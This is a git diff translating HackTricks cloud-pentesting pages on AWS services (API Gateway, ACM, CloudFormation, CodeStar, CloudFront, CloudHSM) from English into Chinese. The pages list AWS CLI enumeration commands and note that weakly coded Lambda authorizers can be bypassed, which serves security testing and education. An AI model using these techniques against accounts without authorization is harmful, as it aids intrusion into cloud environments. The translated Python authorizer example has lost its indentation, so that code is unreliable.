+- 服务本身运行在 **独立的基础设施实例** 上,例如 EC2。 +- **AWS** 负责 **管理操作系统和平台**。 +- AWS 提供的托管服务,通常是 **被视为容器的实际应用服务**。 +- 作为这些容器服务的用户,您有许多管理和安全责任,包括 **管理网络访问安全,例如网络访问控制列表规则和任何防火墙**。 +- 另外,平台级身份和访问管理(如果存在)。 +- **AWS** 容器服务的 **示例** 包括关系数据库服务、弹性 Mapreduce 和弹性 Beanstalk。 -### Abstract Services +### 抽象服务 -- These services are **removed, abstracted, from the platform or management layer which cloud applications are built on**. -- The services are accessed via endpoints using AWS application programming interfaces, APIs. -- The **underlying infrastructure, operating system, and platform is managed by AWS**. -- The abstracted services provide a multi-tenancy platform on which the underlying infrastructure is shared. -- **Data is isolated via security mechanisms**. -- Abstract services have a strong integration with IAM, and **examples** of abstract services include S3, DynamoDB, Amazon Glacier, and SQS. +- 这些服务是 **从构建云应用程序的平台或管理层中移除、抽象出来的**。 +- 通过使用 AWS 应用程序编程接口(API)的端点访问这些服务。 +- **基础设施、操作系统和平台由 AWS 管理**。 +- 抽象服务提供一个多租户平台,基础设施在其上共享。 +- **数据通过安全机制隔离**。 +- 抽象服务与 IAM 有强集成,**抽象服务的示例** 包括 S3、DynamoDB、Amazon Glacier 和 SQS。 -## Services Enumeration +## 服务枚举 -**The pages of this section are ordered by AWS service. In there you will be able to find information about the service (how it works and capabilities) and that will allow you to escalate privileges.** +**本节的页面按 AWS 服务排序。在这里您将能够找到有关服务的信息(如何工作和功能),这将允许您提升权限。** {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md index 09aa42d7c..78c62e8f8 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md @@ -4,40 +4,39 @@ ## API Gateway -### Basic Information +### 基本信息 -AWS API Gateway is a comprehensive service offered by Amazon Web Services (AWS) designed for developers to **create, publish, and oversee APIs on a large scale**. It functions as an entry point to an application, permitting developers to establish a framework of rules and procedures. This framework governs the access external users have to certain data or functionalities within the application. +AWS API Gateway 是亚马逊网络服务(AWS)提供的一项综合服务,旨在帮助开发者**大规模创建、发布和管理 API**。它作为应用程序的入口点,允许开发者建立一套规则和程序框架。该框架管理外部用户对应用程序中特定数据或功能的访问。 -API Gateway enables you to define **how requests to your APIs should be handled**, and it can create custom API endpoints with specific methods (e.g., GET, POST, PUT, DELETE) and resources. It can also generate client SDKs (Software Development Kits) to make it easier for developers to call your APIs from their applications. +API Gateway 使您能够定义**如何处理对您的 API 的请求**,并可以创建具有特定方法(例如 GET、POST、PUT、DELETE)和资源的自定义 API 端点。它还可以生成客户端 SDK(软件开发工具包),以便开发者更轻松地从他们的应用程序调用您的 API。 -### API Gateways Types +### API 网关类型 -- **HTTP API**: Build low-latency and cost-effective REST APIs with built-in features such as OIDC and OAuth2, and native CORS support. Works with the following: Lambda, HTTP backends. -- **WebSocket API**: Build a WebSocket API using persistent connections for real-time use cases such as chat applications or dashboards. Works with the following: Lambda, HTTP, AWS Services. -- **REST API**: Develop a REST API where you gain complete control over the request and response along with API management capabilities. Works with the following: Lambda, HTTP, AWS Services. 
-- **REST API Private**: Create a REST API that is only accessible from within a VPC. +- **HTTP API**:构建低延迟和成本效益高的 REST API,具有内置功能,如 OIDC 和 OAuth2,以及原生 CORS 支持。与以下内容兼容:Lambda、HTTP 后端。 +- **WebSocket API**:使用持久连接构建 WebSocket API,适用于实时用例,如聊天应用程序或仪表板。与以下内容兼容:Lambda、HTTP、AWS 服务。 +- **REST API**:开发 REST API,您可以完全控制请求和响应以及 API 管理功能。与以下内容兼容:Lambda、HTTP、AWS 服务。 +- **REST API 私有**:创建仅可从 VPC 内部访问的 REST API。 -### API Gateway Main Components +### API Gateway 主要组件 -1. **Resources**: In API Gateway, resources are the components that **make up the structure of your API**. They represent **the different paths or endpoints** of your API and correspond to the various actions that your API supports. A resource is each method (e.g., GET, POST, PUT, DELETE) **inside each path** (/, or /users, or /user/{id}. -2. **Stages**: Stages in API Gateway represent **different versions or environments** of your API, such as development, staging, or production. You can use stages to manage and deploy **multiple versions of your API simultaneousl**y, allowing you to test new features or bug fixes without affecting the production environment. Stages also **support stage variables**, which are key-value pairs that can be used to configure the behavior of your API based on the current stage. For example, you could use stage variables to direct API requests to different Lambda functions or other backend services depending on the stage. - - The stage is indicated at the beggining of the URL of the API Gateway endpoint. -3. **Authorizers**: Authorizers in API Gateway are responsible for **controlling access to your API** by verifying the identity of the caller before allowing the request to proceed. You can use **AWS Lambda functions** as custom authorizers, which allows you to implement your own authentication and authorization logic. When a request comes in, API Gateway passes the request's authorization token to the Lambda authorizer, which processes the token and returns an IAM policy that determines what actions the caller is allowed to perform. API Gateway also supports **built-in authorizers**, such as **AWS Identity and Access Management (IAM)** and **Amazon Cognito**. -4. **Resource Policy**: A resource policy in API Gateway is a JSON document that **defines the permissions for accessing your API**. It is similar to an IAM policy but specifically tailored for API Gateway. You can use a resource policy to control who can access your API, which methods they can call, and from which IP addresses or VPCs they can connect. **Resource policies can be used in combination with authorizers** to provide fine-grained access control for your API. - - In order to make effect the API needs to be **deployed again after** the resource policy is modified. +1. **资源**:在 API Gateway 中,资源是**构成您 API 结构的组件**。它们代表**您 API 的不同路径或端点**,并对应于您的 API 支持的各种操作。资源是每个路径(/、/users 或 /user/{id})**内的每个方法**(例如 GET、POST、PUT、DELETE)。 +2. **阶段**:API Gateway 中的阶段代表您 API 的**不同版本或环境**,例如开发、预发布或生产。您可以使用阶段来管理和部署**多个版本的 API 同时**,允许您在不影响生产环境的情况下测试新功能或修复错误。阶段还**支持阶段变量**,这些是可以根据当前阶段配置 API 行为的键值对。例如,您可以使用阶段变量根据阶段将 API 请求定向到不同的 Lambda 函数或其他后端服务。 +- 阶段在 API Gateway 端点的 URL 开头指示。 +3. **授权者**:API Gateway 中的授权者负责**控制对您 API 的访问**,通过在允许请求继续之前验证调用者的身份。您可以使用**AWS Lambda 函数**作为自定义授权者,这使您能够实现自己的身份验证和授权逻辑。当请求到达时,API Gateway 将请求的授权令牌传递给 Lambda 授权者,后者处理该令牌并返回一个 IAM 策略,确定调用者被允许执行的操作。API Gateway 还支持**内置授权者**,如**AWS 身份与访问管理(IAM)**和**亚马逊 Cognito**。 +4. 
**资源策略**:API Gateway 中的资源策略是一个 JSON 文档,**定义访问您 API 的权限**。它类似于 IAM 策略,但专门为 API Gateway 定制。您可以使用资源策略来控制谁可以访问您的 API,他们可以调用哪些方法,以及他们可以从哪些 IP 地址或 VPC 连接。**资源策略可以与授权者结合使用**,为您的 API 提供细粒度的访问控制。 +- 为了使效果生效,API 需要在**修改资源策略后重新部署**。 -### Logging +### 日志记录 -By default, **CloudWatch Logs** are **off**, **Access Logging** is **off**, and **X-Ray tracing** is also **off**. +默认情况下,**CloudWatch 日志**是**关闭的**,**访问日志**是**关闭的**,**X-Ray 跟踪**也是**关闭的**。 -### Enumeration +### 枚举 > [!TIP] -> Note that in both AWS apis to enumerate resources (**`apigateway`** and **`apigatewayv2`**) the only permission you need and the only read permission grantable is **`apigateway:GET`**, with that you can **enumerate everything.** +> 请注意,在两个 AWS API 中枚举资源(**`apigateway`** 和 **`apigatewayv2`**)时,您所需的唯一权限和唯一可授予的读取权限是**`apigateway:GET`**,通过此权限您可以**枚举所有内容**。 {{#tabs }} {{#tab name="apigateway" }} - ```bash # Generic info aws apigateway get-account @@ -78,11 +77,9 @@ aws apigateway get-usage-plan-key --usage-plan-id --key-id ###Already consumed aws apigateway get-usage --usage-plan-id --start-date 2023-07-01 --end-date 2023-07-12 ``` - {{#endtab }} {{#tab name="apigatewayv2" }} - ```bash # Generic info aws apigatewayv2 get-domain-names @@ -124,49 +121,43 @@ aws apigatewayv2 get-models --api-id ## Call API https://.execute-api..amazonaws.com// ``` - {{#endtab }} {{#endtabs }} -## Different Authorizations to access API Gateway endpoints +## 访问 API Gateway 端点的不同授权 -### Resource Policy +### 资源策略 -It's possible to use resource policies to define who could call the API endpoints.\ -In the following example you can see that the **indicated IP cannot call** the endpoint `/resource_policy` via GET. +可以使用资源策略来定义谁可以调用 API 端点。\ +在以下示例中,您可以看到 **指示的 IP 无法通过 GET 调用** 端点 `/resource_policy`。
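The original page illustrates this with a screenshot. As a rough CLI sketch of the same idea (the API ID, account ID, region and source IP below are made-up placeholders, and `jq` is assumed to be available), a resource policy that denies one source IP for `GET /resource_policy` could be attached and then redeployed like this:
```bash
# Hypothetical policy: allow the API in general, but deny GET /resource_policy for 1.2.3.4
cat > resource-policy.json <<'EOF'
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": "*",
      "Action": "execute-api:Invoke",
      "Resource": "arn:aws:execute-api:us-east-1:123456789012:a1b2c3d4e5/*"
    },
    {
      "Effect": "Deny",
      "Principal": "*",
      "Action": "execute-api:Invoke",
      "Resource": "arn:aws:execute-api:us-east-1:123456789012:a1b2c3d4e5/*/GET/resource_policy",
      "Condition": { "IpAddress": { "aws:SourceIp": "1.2.3.4/32" } }
    }
  ]
}
EOF

# Attach the policy (the patch operation value must be the policy JSON as an escaped string)
aws apigateway update-rest-api --rest-api-id a1b2c3d4e5 \
  --patch-operations "[{\"op\":\"replace\",\"path\":\"/policy\",\"value\":$(jq -c . resource-policy.json | jq -Rs .)}]"

# The policy only takes effect once the API is deployed again
aws apigateway create-deployment --rest-api-id a1b2c3d4e5 --stage-name prod
```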
-### IAM Authorizer +### IAM 授权者 -It's possible to set that a methods inside a path (a resource) requires IAM authentication to call it. +可以设置路径(资源)中的方法需要 IAM 身份验证才能调用。
-When this is set you will receive the error `{"message":"Missing Authentication Token"}` when you try to reach the endpoint without any authorization. - -One easy way to generate the expected token by the application is to use **curl**. +设置后,当您尝试在没有任何授权的情况下访问端点时,将收到错误 `{"message":"Missing Authentication Token"}`。 +生成应用程序所需的预期令牌的一种简单方法是使用 **curl**。 ```bash $ curl -X https://.execute-api..amazonaws.com// --user : --aws-sigv4 "aws:amz::execute-api" ``` - -Another way is to use the **`Authorization`** type **`AWS Signature`** inside **Postman**. +另一种方法是在 **Postman** 中使用 **`Authorization`** 类型 **`AWS Signature`**。
-Set the accessKey and the SecretKey of the account you want to use and you can know authenticate against the API endpoint. - -Both methods will generate an **Authorization** **header** such as: +设置您要使用的帐户的 accessKey 和 SecretKey,您就可以对 API 端点进行身份验证。 +这两种方法都会生成一个 **Authorization** **header**,例如: ``` AWS4-HMAC-SHA256 Credential=AKIAYY7XU6ECUDOTWB7W/20220726/us-east-1/execute-api/aws4_request, SignedHeaders=host;x-amz-date, Signature=9f35579fa85c0d089c5a939e3d711362e92641e8c14cc571df8c71b4bc62a5c2 ``` +注意,在其他情况下,**Authorizer** 可能被 **错误编码**,只需在 **Authorization header** 中发送 **任何内容** 就会 **允许查看隐藏内容**。 -Note that in other cases the **Authorizer** might have been **bad coded** and just sending **anything** inside the **Authorization header** will **allow to see the hidden content**. - -### Request Signing Using Python - +### 使用 Python 进行请求签名 ```python pip install requests @@ -193,111 +184,104 @@ response = requests.get(url, auth=awsauth) print(response.text) ``` +### 自定义 Lambda 授权器 -### Custom Lambda Authorizer - -It's possible to use a lambda that based in a given token will **return an IAM policy** indicating if the user is **authorized to call the API endpoint**.\ -You can set each resource method that will be using the authoriser. +可以使用一个基于给定令牌的 lambda,**返回一个 IAM 策略**,指示用户是否**有权调用 API 端点**。\ +您可以设置将使用授权器的每个资源方法。
-Lambda Authorizer Code Example - +Lambda 授权器代码示例 ```python import json def lambda_handler(event, context): - token = event['authorizationToken'] - method_arn = event['methodArn'] +token = event['authorizationToken'] +method_arn = event['methodArn'] - if not token: - return { - 'statusCode': 401, - 'body': 'Unauthorized' - } +if not token: +return { +'statusCode': 401, +'body': 'Unauthorized' +} - try: - # Replace this with your own token validation logic - if token == "your-secret-token": - return generate_policy('user', 'Allow', method_arn) - else: - return generate_policy('user', 'Deny', method_arn) - except Exception as e: - print(e) - return { - 'statusCode': 500, - 'body': 'Internal Server Error' - } +try: +# Replace this with your own token validation logic +if token == "your-secret-token": +return generate_policy('user', 'Allow', method_arn) +else: +return generate_policy('user', 'Deny', method_arn) +except Exception as e: +print(e) +return { +'statusCode': 500, +'body': 'Internal Server Error' +} def generate_policy(principal_id, effect, resource): - policy = { - 'principalId': principal_id, - 'policyDocument': { - 'Version': '2012-10-17', - 'Statement': [ - { - 'Action': 'execute-api:Invoke', - 'Effect': effect, - 'Resource': resource - } - ] - } - } - return policy +policy = { +'principalId': principal_id, +'policyDocument': { +'Version': '2012-10-17', +'Statement': [ +{ +'Action': 'execute-api:Invoke', +'Effect': effect, +'Resource': resource +} +] +} +} +return policy ``` -
-Call it with something like: +用类似下面的方式调用它:
curl "https://jhhqafgh6f.execute-api.eu-west-1.amazonaws.com/prod/custom_auth" -H 'Authorization: your-secret-token'
 
> [!WARNING] -> Depending on the Lambda code, this authorization might be vulnerable +> 根据Lambda代码,这个授权可能存在漏洞 -Note that if a **deny policy is generated and returned** the error returned by API Gateway is: `{"Message":"User is not authorized to access this resource with an explicit deny"}` +请注意,如果生成并返回了**拒绝策略**,API Gateway返回的错误是:`{"Message":"User is not authorized to access this resource with an explicit deny"}` -This way you could **identify this authorization** being in place. +通过这种方式,您可以**识别此授权**的存在。 -### Required API Key +### 所需的API密钥 -It's possible to set API endpoints that **require a valid API key** to contact it. +可以设置需要**有效API密钥**才能联系的API端点。
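Clients present the key in the **`x-api-key`** header. A minimal sketch against a hypothetical endpoint (the URL and key below are placeholders):
```bash
# Without a (valid) key, API Gateway answers 403 {"message":"Forbidden"}
curl "https://a1b2c3d4e5.execute-api.us-east-1.amazonaws.com/prod/protected"

# With a key that belongs to a usage plan associated to this stage, the call goes through
curl "https://a1b2c3d4e5.execute-api.us-east-1.amazonaws.com/prod/protected" \
  -H "x-api-key: 0123456789abcdef0123456789abcdef"
```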
-It's possible to generate API keys in the API Gateway portal and even set how much it can be used (in terms of requests per second and in terms of requests per month). +可以在API Gateway门户中生成API密钥,甚至可以设置其使用量(每秒请求数和每月请求数)。 -To make an API key work, you need to add it to a **Usage Plan**, this usage plan mus be added to the **API Stage** and the associated API stage needs to have a configured a **method throttling** to the **endpoint** requiring the API key: +要使API密钥生效,您需要将其添加到**使用计划**中,该使用计划必须添加到**API阶段**,并且相关的API阶段需要为需要API密钥的**端点**配置**方法限流**:
-## Unauthenticated Access +## 未经身份验证的访问 {{#ref}} ../aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md {{#endref}} -## Privesc +## 权限提升 {{#ref}} ../aws-privilege-escalation/aws-apigateway-privesc.md {{#endref}} -## Post Exploitation +## 后期利用 {{#ref}} ../aws-post-exploitation/aws-api-gateway-post-exploitation.md {{#endref}} -## Persistence +## 持久性 {{#ref}} ../aws-persistence/aws-api-gateway-persistence.md {{#endref}} {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.md b/src/pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.md index 0f3da9d50..d258685f1 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.md @@ -1,19 +1,18 @@ -# AWS - Certificate Manager (ACM) & Private Certificate Authority (PCA) +# AWS - 证书管理器 (ACM) & 私有证书授权机构 (PCA) {{#include ../../../banners/hacktricks-training.md}} -## Basic Information +## 基本信息 -**AWS Certificate Manager (ACM)** is provided as a service aimed at streamlining the **provisioning, management, and deployment of SSL/TLS certificates** for AWS services and internal resources. The necessity for manual processes, such as purchasing, uploading, and certificate renewals, is **eliminated** by ACM. This allows users to efficiently request and implement certificates on various AWS resources including **Elastic Load Balancers, Amazon CloudFront distributions, and APIs on API Gateway**. +**AWS 证书管理器 (ACM)** 是一项旨在简化 **SSL/TLS 证书的提供、管理和部署** 的服务,适用于 AWS 服务和内部资源。ACM **消除了** 手动流程的必要性,例如购买、上传和证书续订。这使得用户能够高效地请求和实施证书,适用于各种 AWS 资源,包括 **弹性负载均衡器、Amazon CloudFront 分发和 API 网关上的 API**。 -A key feature of ACM is the **automatic renewal of certificates**, significantly reducing the management overhead. Furthermore, ACM supports the creation and centralized management of **private certificates for internal use**. Although SSL/TLS certificates for integrated AWS services like Elastic Load Balancing, Amazon CloudFront, and Amazon API Gateway are provided at no extra cost through ACM, users are responsible for the costs associated with the AWS resources utilized by their applications and a monthly fee for each **private Certificate Authority (CA)** and private certificates used outside integrated ACM services. +ACM 的一个关键特性是 **证书的自动续订**,显著减少了管理开销。此外,ACM 支持创建和集中管理 **用于内部使用的私有证书**。尽管通过 ACM 提供的集成 AWS 服务(如弹性负载均衡、Amazon CloudFront 和 Amazon API 网关)的 SSL/TLS 证书没有额外费用,但用户需承担其应用程序所使用的 AWS 资源相关费用,以及每个 **私有证书授权机构 (CA)** 和在集成 ACM 服务之外使用的私有证书的月费。 -**AWS Private Certificate Authority** is offered as a **managed private CA service**, enhancing ACM's capabilities by extending certificate management to include private certificates. These private certificates are instrumental in authenticating resources within an organization. 
+**AWS 私有证书授权机构** 作为 **托管私有 CA 服务** 提供,增强了 ACM 的功能,将证书管理扩展到包括私有证书。这些私有证书在组织内部资源的身份验证中发挥着重要作用。 -## Enumeration +## 枚举 ### ACM - ```bash # List certificates aws acm list-certificates @@ -27,9 +26,7 @@ aws acm get-certificate --certificate-arn "arn:aws:acm:us-east-1:188868097724:ce # Account configuration aws acm get-account-configuration ``` - ### PCM - ```bash # List CAs aws acm-pca list-certificate-authorities @@ -49,7 +46,6 @@ aws acm-pca get-certificate-authority-csr --certificate-authority-arn # Get CA Policy (if any) aws acm-pca get-policy --resource-arn ``` - ## Privesc TODO @@ -59,7 +55,3 @@ TODO TODO {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md index 66539b87d..c95f37ef1 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md @@ -4,10 +4,9 @@ ## CloudFormation -AWS CloudFormation is a service designed to **streamline the management of AWS resources**. It enables users to focus more on their applications running in AWS by **minimizing the time spent on resource management**. The core feature of this service is the **template**—a descriptive model of the desired AWS resources. Once this template is provided, CloudFormation is responsible for the **provisioning and configuration** of the specified resources. This automation facilitates a more efficient and error-free management of AWS infrastructure. +AWS CloudFormation 是一项旨在 **简化 AWS 资源管理** 的服务。它使用户能够更多地关注在 AWS 上运行的应用程序,通过 **减少在资源管理上花费的时间**。该服务的核心功能是 **模板**——所需 AWS 资源的描述模型。一旦提供了该模板,CloudFormation 负责 **指定资源的供应和配置**。这种自动化促进了更高效和无错误的 AWS 基础设施管理。 ### Enumeration - ```bash # Stacks aws cloudformation list-stacks @@ -30,10 +29,9 @@ aws cloudformation list-stack-instances --stack-set-name aws cloudformation list-stack-set-operations --stack-set-name aws cloudformation list-stack-set-operation-results --stack-set-name --operation-id ``` - ### Privesc -In the following page you can check how to **abuse cloudformation permissions to escalate privileges**: +在以下页面中,您可以查看如何**滥用cloudformation权限以提升特权**: {{#ref}} ../aws-privilege-escalation/aws-cloudformation-privesc/ @@ -41,14 +39,13 @@ In the following page you can check how to **abuse cloudformation permissions to ### Post-Exploitation -Check for **secrets** or sensitive information in the **template, parameters & output** of each CloudFormation +检查每个CloudFormation的**模板、参数和输出**中的**秘密**或敏感信息 ## Codestar -AWS CodeStar is a service for creating, managing, and working with software development projects on AWS. You can quickly develop, build, and deploy applications on AWS with an AWS CodeStar project. An AWS CodeStar project creates and **integrates AWS services** for your project development toolchain. Depending on your choice of AWS CodeStar project template, that toolchain might include source control, build, deployment, virtual servers or serverless resources, and more. AWS CodeStar also **manages the permissions required for project users** (called team members). 
+AWS CodeStar是一个用于在AWS上创建、管理和处理软件开发项目的服务。您可以通过AWS CodeStar项目快速开发、构建和部署应用程序。AWS CodeStar项目为您的项目开发工具链创建并**集成AWS服务**。根据您选择的AWS CodeStar项目模板,该工具链可能包括源代码控制、构建、部署、虚拟服务器或无服务器资源等。AWS CodeStar还**管理项目用户**(称为团队成员)所需的权限。 ### Enumeration - ```bash # Get projects information aws codestar list-projects @@ -56,13 +53,12 @@ aws codestar describe-project --id aws codestar list-resources --project-id aws codestar list-team-members --project-id - aws codestar list-user-profiles - aws codestar describe-user-profile --user-arn +aws codestar list-user-profiles +aws codestar describe-user-profile --user-arn ``` - ### Privesc -In the following page you can check how to **abuse codestar permissions to escalate privileges**: +在以下页面中,您可以查看如何**滥用codestar权限以提升特权**: {{#ref}} ../aws-privilege-escalation/aws-codestar-privesc/ @@ -73,7 +69,3 @@ In the following page you can check how to **abuse codestar permissions to escal - [https://docs.aws.amazon.com/cloudformation/](https://docs.aws.amazon.com/cloudformation/) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.md index 75613cdb4..8b134e7cd 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.md @@ -4,20 +4,19 @@ ## CloudFront -CloudFront is AWS's **content delivery network that speeds up distribution** of your static and dynamic content through its worldwide network of edge locations. When you use a request content that you're hosting through Amazon CloudFront, the request is routed to the closest edge location which provides it the lowest latency to deliver the best performance. When **CloudFront access logs** are enabled you can record the request from each user requesting access to your website and distribution. As with S3 access logs, these logs are also **stored on Amazon S3 for durable and persistent storage**. There are no charges for enabling logging itself, however, as the logs are stored in S3 you will be stored for the storage used by S3. +CloudFront 是 AWS 的 **内容分发网络,能够加速** 通过其全球边缘位置网络分发您的静态和动态内容。当您使用通过 Amazon CloudFront 托管的请求内容时,请求会被路由到最近的边缘位置,从而提供最低延迟以实现最佳性能。当 **CloudFront 访问日志** 被启用时,您可以记录每个用户请求访问您网站和分发的请求。与 S3 访问日志一样,这些日志也 **存储在 Amazon S3 中以实现持久和耐用的存储**。启用日志记录本身没有费用,但由于日志存储在 S3 中,您将为 S3 使用的存储付费。 -The log files capture data over a period of time and depending on the amount of requests that are received by Amazon CloudFront for that distribution will depend on the amount of log fils that are generated. It's important to know that these log files are not created or written to on S3. S3 is simply where they are delivered to once the log file is full. **Amazon CloudFront retains these logs until they are ready to be delivered to S3**. Again, depending on the size of these log files this delivery can take **between one and 24 hours**. +日志文件在一段时间内捕获数据,具体取决于 Amazon CloudFront 为该分发接收到的请求数量,这将决定生成的日志文件数量。重要的是要知道,这些日志文件并不是在 S3 上创建或写入的。S3 只是它们在日志文件满时被传送到的地方。**Amazon CloudFront 保留这些日志,直到它们准备好传送到 S3**。同样,具体取决于这些日志文件的大小,这种传送可能需要 **一到 24 小时**。 -**By default cookie logging is disabled** but you can enable it. +**默认情况下,Cookie 日志记录是禁用的**,但您可以启用它。 ### Functions -You can create functions in CloudFront. These functions will have its **endpoint in cloudfront** defined and will run a declared **NodeJS code**. 
This code will run inside a **sandbox** in a machine running under an AWS managed machine (you would need a sandbox bypass to manage to escape to the underlaying OS). +您可以在 CloudFront 中创建函数。这些函数将具有定义的 **cloudfront 端点**,并将运行声明的 **NodeJS 代码**。这段代码将在运行在 AWS 管理机器上的 **沙箱** 内运行(您需要一个沙箱绕过才能成功逃逸到底层操作系统)。 -As the functions aren't run in the users AWS account. no IAM role is attached so no direct privesc is possible abusing this feature. +由于这些函数不是在用户的 AWS 账户中运行,因此没有附加 IAM 角色,因此无法通过滥用此功能实现直接权限提升。 ### Enumeration - ```bash aws cloudfront list-distributions aws cloudfront get-distribution --id # Just get 1 @@ -28,21 +27,16 @@ aws cloudfront get-function --name TestFunction function_code.js aws cloudfront list-distributions | jq ".DistributionList.Items[] | .Id, .Origins.Items[].Id, .Origins.Items[].DomainName, .AliasICPRecordals[].CNAME" ``` - -## Unauthenticated Access +## 未经身份验证的访问 {{#ref}} ../aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md {{#endref}} -## Post Exploitation +## 后期利用 {{#ref}} ../aws-post-exploitation/aws-cloudfront-post-exploitation.md {{#endref}} {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.md index 55216fa7e..a3cdaf811 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.md @@ -2,70 +2,49 @@ {{#include ../../../banners/hacktricks-training.md}} -## HSM - Hardware Security Module +## HSM - 硬件安全模块 -Cloud HSM is a FIPS 140 level two validated **hardware device** for secure cryptographic key storage (note that CloudHSM is a hardware appliance, it is not a virtualized service). It is a SafeNetLuna 7000 appliance with 5.3.13 preloaded. There are two firmware versions and which one you pick is really based on your exact needs. One is for FIPS 140-2 compliance and there was a newer version that can be used. +Cloud HSM 是一个 FIPS 140 级别二验证的 **硬件设备**,用于安全的加密密钥存储(请注意,CloudHSM 是一个硬件设备,而不是虚拟化服务)。它是一个预装了 5.3.13 的 SafeNetLuna 7000 设备。这里有两个固件版本,您选择哪个版本实际上取决于您的具体需求。一个是用于 FIPS 140-2 合规性,还有一个更新版本可以使用。 -The unusual feature of CloudHSM is that it is a physical device, and thus it is **not shared with other customers**, or as it is commonly termed, multi-tenant. It is dedicated single tenant appliance exclusively made available to your workloads +CloudHSM 的不寻常之处在于它是一个物理设备,因此它 **不与其他客户共享**,或者通常称为多租户。它是专用的单租户设备,仅供您的工作负载使用。 -Typically, a device is available within 15 minutes assuming there is capacity, but in some zones there could not be. +通常,设备在有容量的情况下可在 15 分钟内提供,但在某些区域可能无法提供。 -Since this is a physical device dedicated to you, **the keys are stored on the device**. Keys need to either be **replicated to another device**, backed up to offline storage, or exported to a standby appliance. **This device is not backed** by S3 or any other service at AWS like KMS. +由于这是一个专门为您提供的物理设备,**密钥存储在设备上**。密钥需要 **复制到另一个设备**、备份到离线存储,或导出到备用设备。**该设备不受** S3 或 AWS 的任何其他服务(如 KMS)的支持。 -In **CloudHSM**, you have to **scale the service yourself**. You have to provision enough CloudHSM devices to handle whatever your encryption needs are based on the encryption algorithms you have chosen to implement for your solution.\ -Key Management Service scaling is performed by AWS and automatically scales on demand, so as your use grows, so might the number of CloudHSM appliances that are required. 
Keep this in mind as you scale your solution and if your solution has auto-scaling, make sure your maximum scale is accounted for with enough CloudHSM appliances to service the solution. +在 **CloudHSM** 中,您必须 **自行扩展服务**。您必须配置足够的 CloudHSM 设备,以处理您根据所选择的加密算法实施的加密需求。\ +密钥管理服务的扩展由 AWS 执行,并根据需求自动扩展,因此随着您的使用增长,所需的 CloudHSM 设备数量也可能增加。在扩展解决方案时请记住这一点,如果您的解决方案具有自动扩展功能,请确保您的最大扩展考虑到足够的 CloudHSM 设备来服务该解决方案。 -Just like scaling, **performance is up to you with CloudHSM**. Performance varies based on which encryption algorithm is used and on how often you need to access or retrieve the keys to encrypt the data. Key management service performance is handled by Amazon and automatically scales as demand requires it. CloudHSM's performance is achieved by adding more appliances and if you need more performance you either add devices or alter the encryption method to the algorithm that is faster. +就像扩展一样,**CloudHSM 的性能取决于您**。性能因使用的加密算法和您需要访问或检索密钥以加密数据的频率而异。密钥管理服务的性能由亚马逊处理,并根据需求自动扩展。CloudHSM 的性能通过添加更多设备来实现,如果您需要更高的性能,您可以添加设备或更改加密方法为更快的算法。 -If your solution is **multi-region**, you should add several **CloudHSM appliances in the second region and work out the cross-region connectivity with a private VPN connection** or some method to ensure the traffic is always protected between the appliance at every layer of the connection. If you have a multi-region solution you need to think about how to **replicate keys and set up additional CloudHSM devices in the regions where you operate**. You can very quickly get into a scenario where you have six or eight devices spread across multiple regions, enabling full redundancy of your encryption keys. +如果您的解决方案是 **多区域的**,您应该在第二个区域添加几个 **CloudHSM 设备,并通过私有 VPN 连接解决跨区域连接问题**,或采用某种方法确保在每一层连接中流量始终受到保护。如果您有多区域解决方案,您需要考虑如何 **复制密钥并在您运营的区域设置额外的 CloudHSM 设备**。您可能很快就会进入一个场景,您在多个区域分布有六个或八个设备,从而实现加密密钥的完全冗余。 -**CloudHSM** is an enterprise class service for secured key storage and can be used as a **root of trust for an enterprise**. It can store private keys in PKI and certificate authority keys in X509 implementations. In addition to symmetric keys used in symmetric algorithms such as AES, **KMS stores and physically protects symmetric keys only (cannot act as a certificate authority)**, so if you need to store PKI and CA keys a CloudHSM or two or three could be your solution. +**CloudHSM** 是一个企业级服务,用于安全密钥存储,可以作为 **企业的信任根**。它可以在 PKI 中存储私钥和在 X509 实现中的证书颁发机构密钥。除了在对称算法(如 AES)中使用的对称密钥外,**KMS 仅存储和物理保护对称密钥(不能充当证书颁发机构)**,因此如果您需要存储 PKI 和 CA 密钥,两个或三个 CloudHSM 可能是您的解决方案。 -**CloudHSM is considerably more expensive than Key Management Service**. CloudHSM is a hardware appliance so you have fix costs to provision the CloudHSM device, then an hourly cost to run the appliance. The cost is multiplied by as many CloudHSM appliances that are required to achieve your specific requirements.\ -Additionally, cross consideration must be made in the purchase of third party software such as SafeNet ProtectV software suites and integration time and effort. Key Management Service is a usage based and depends on the number of 